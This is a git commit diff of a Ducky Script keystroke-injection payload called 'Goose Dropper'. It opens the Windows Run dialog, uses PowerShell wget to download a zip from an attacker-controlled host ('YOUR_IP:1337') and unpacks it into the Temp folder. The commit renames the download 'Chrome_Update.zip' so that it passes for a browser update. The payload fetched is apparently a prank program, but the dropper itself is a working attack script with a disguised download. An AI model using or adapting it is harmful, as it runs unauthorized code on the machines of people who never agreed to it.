Goose Dropper v2.0 bugfix
This commit is contained in:
@@ -4,12 +4,12 @@ REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and r
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip
|
||||
STRING powershell wget YOUR_IP:1337/Chrome_Update.zip -OutFile $ENV:Temp/Update.zip
|
||||
ENTER
|
||||
DELAY 8000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update
|
||||
STRING powershell Expand-Archive $ENV:Temp\Update.zip -DestinationPath $ENV:Temp\Chrome_Update
|
||||
ENTER
|
||||
DELAY 3000
|
||||
GUI r
|
||||
|
||||
Reference in New Issue
Block a user